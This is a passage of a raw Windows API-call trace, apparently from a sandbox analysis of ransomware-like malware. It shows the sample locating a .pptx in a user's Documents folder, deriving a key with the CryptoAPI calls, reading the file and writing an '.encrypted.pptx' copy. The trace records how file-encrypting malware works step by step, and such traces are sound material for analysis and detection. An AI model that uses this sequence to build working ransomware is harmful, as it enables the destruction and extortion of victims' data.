lpString1="s9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HWEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WEpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EpFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fvwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vwpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wpo.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.551] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.551] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.551] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.552] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.552] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.552] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.552] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.552] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x17f12a10, ftLastWriteTime.dwHighDateTime=0x1d53a60, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0x7c2240 [0036.552] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.552] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.553] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.564] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.565] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.565] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.565] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.565] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.565] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.566] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0036.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.566] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mtos9hwepfvwpo.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.566] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.566] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mtos9hwepfvwpo.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.568] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.568] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0036.568] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.568] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.568] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.570] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x5d56, lpOverlapped=0x0) returned 1 [0036.571] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15d56) returned 0x955018 [0036.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15d56) returned 0x96ad78 [0036.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15d56) returned 0x955018 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.577] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.577] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.577] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15d56) returned 0x955018 [0036.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15d56) returned 0x88ffb0 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 